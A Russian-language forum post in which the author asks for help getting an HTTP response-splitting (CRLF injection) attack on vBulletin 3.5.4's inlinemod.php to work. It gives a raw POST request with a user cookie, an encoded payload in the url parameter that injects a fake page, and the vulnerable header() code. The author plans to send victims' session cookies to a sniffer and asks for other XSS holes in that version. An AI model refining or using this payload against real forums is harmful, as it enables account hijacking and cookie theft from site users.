помогите разобраться Code: POST /vb354/inlinemod.php HTTP/1.0 Cookie: bbpassword=a5c3d9e61bcb8dea99105143c772bcd9; bbuserid=1 Content-Length: 93 Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Host: www.vulnerable.com Content-Type: application/x-www-form-urlencoded do=clearthread&url=lala2%0d%0aContent-Length: %2033%0d%0a%0d%0a<html>Hacked!</html>%0d% 0a%0d%0a сделал небольшую форму с двумя полями do и url через пост на форум передаю эти два параметра do=clearthread url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d% 0a%0d%0a место где все происходит в коде: Code: header("Location: $url", 0, 301); как я понимаю, должно послаться два заголовка, location и content-type но на деле идут только location, в броузер кидает такую строку http://127.0.0.1(форум на локал машине запущен)/lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a вместо %0d%0a пробовал передавать \n\r, но результат тот же каким образом можно отправить 2 заголовка? что я делаю не так? плюс символы < > " заменяются на " < > отправить несколько заголовков думаю точно можно, иначе бы в версии 3.6.0 не сделали проверку Code: if (strpos($url, "\r\n") !== false) { trigger_error("Header may not contain more than a single header, new line detected.", E_USER_ERROR); } и еще, вместо lala2 можно было бы подставить адрес сниффера, но каким образом передать куки? что-то типа такого {$_COOKIE['member_id']} не работает, переменные не раскрываются спасибо за внимание
неужели никто не сталкивался с этим? или то, как эту дырку можно использовать, в приватном разделе.. если не трудно намекните хотя бы в каком направлении двигаться? может быть есть другие хсс на данную версию?